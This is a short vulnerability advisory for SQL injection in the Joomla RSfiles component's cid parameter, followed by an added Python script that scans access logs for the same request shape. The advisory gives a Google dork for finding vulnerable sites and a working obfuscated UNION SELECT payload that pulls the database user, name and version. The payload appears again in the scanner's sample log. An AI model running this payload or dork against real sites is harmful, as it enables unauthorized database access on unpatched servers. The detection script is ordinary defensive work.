*******************************************************************************
# Title   : Joomla Component RSfiles <= (cid) SQL injection Vulnerability
# Author  : ByEge
# Contact : http://byege.blogspot.com
# Date    : 18.03.2013
# S.Page  : http://www.rsjoomla.com
# Dork    : inurl:index.php?option=com_rsfiles
# DorkEx  : http://www.google.com.tr/#hl=tr&sclient=psy-ab&q=inurl:index.php?option=com_rsfiles

Vulnerability :
?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--

[[SQL Injection Test]]
http://server/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--

*********************************
# Turkey.
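Added example (not part of the original advisory and not RSFiles code): a log check that flags com_rsfiles requests whose cid value matches the shape shown above, after undoing the inline-comment and mixed-case obfuscation. It assumes cid is meant to be a plain integer id and that the web server writes a common-format access log; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
COMMENT = re.compile(r"/\*.*?\*/", re.S)
SQL_TOKENS = re.compile(
    r"\bunion\s+(?:all\s+)?select\b|\b(?:concat_ws|database|version|user)\s*\("
)

def normalize(value):
    """Undo the obfuscation in the advisory: inline comments, mixed case, extra spaces."""
    return " ".join(COMMENT.sub(" ", value).lower().split())

def check_request(target):
    """Return findings for one request target; an empty list means nothing flagged."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_rsfiles" not in params.get("option", []):
        return []
    findings = []
    for cid in params.get("cid", []):  # parse_qs already decoded %xx and '+'
        if not re.fullmatch(r"[0-9]+", cid):  # assumption: cid is an integer id
            findings.append("cid is not a plain integer")
        if SQL_TOKENS.search(normalize(cid)):
            findings.append("SQL keywords in cid after normalization")
    return findings

def scan(log_lines):
    """Return (line_number, findings) for every flagged access-log line."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        findings = check_request(m.group(1)) if m else []
        if findings:
            hits.append((n, findings))
    return hits

# Constructed access-log lines; line 2 carries the request shape from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Mar/2013:10:01:00 +0000] "GET /index.php?option=com_rsfiles'
    '&view=files&layout=agreement&tmpl=component&cid=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Mar/2013:10:02:11 +0000] "GET /?option=com_rsfiles'
    '&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT'
    '+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- HTTP/1.1" 200 812',
    '192.0.2.44 - - [18/Mar/2013:10:03:40 +0000] "GET /index.php?option=com_content'
    '&view=article&id=3 HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG):
        print(f"line {n}: " + "; ".join(findings))
```

The integer check alone is the stricter signal and is also the input validation the parameter needs server-side; the keyword match only adds context for triage.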